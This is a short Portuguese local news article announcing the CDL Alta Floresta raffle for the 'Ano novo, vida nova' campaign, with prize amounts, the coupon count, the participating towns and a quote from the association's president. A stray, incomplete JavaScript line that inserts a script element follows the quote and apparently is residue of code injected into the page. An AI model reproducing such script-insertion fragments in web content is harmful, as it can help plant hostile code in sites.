Capa / Cidades / Sorteio da campanha Ano novo, vida nova acontece sábado

Sorteio da campanha Ano novo, vida nova acontece sábado

Sorteio da campanha Ano novo, vida nova acontece sábadoDa Redação
com Assessoria

O sorteio da campanha Ano Novo Vida Nova, realizado pela Câmara dos Dirigentes Lojistas de Alta Floresta – CDL, acontecerá neste sábado, 30 às 9:00 horas, no auditório do CDL.
Ao todo serão sorteados R$ 57 mil. Desse total R$ 27 mil em dinheiro e o restante em vale compras. O sorteio será coordenado pela comissão fiscalizadora.
Mais de 600 mil cupons foram distribuídos, e para quem ainda não está concorrendo ainda dá tempo de comprar em uma empresa participante da campanha e adquirir o cupom para participar dessa grande oportunidade em começar o ano ganhando uma grana extra.
Segundo a assessoria do CDL este novo formato da campanha atraiu um número recorde de empresas que aderiram a campanha, além de Alta Floresta os CDL’s de Carlinda e Paranaíta também estão participando e os consumidores destes municípios também tem a chance de ganhar um dos prêmios.
Para a presidente da CDL de Alta Floresta, Elsa Maria Lopes a campanha tem o objetivo de fomentar as vendas neste final de ano. “Podemos afirmar que conseguimos alcançar nossas metas, e fazemos um convite especial aos nossos patrocinadores, imprensa, lojistas e consumidores a participar do grande sorteio”, disse Elsa.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top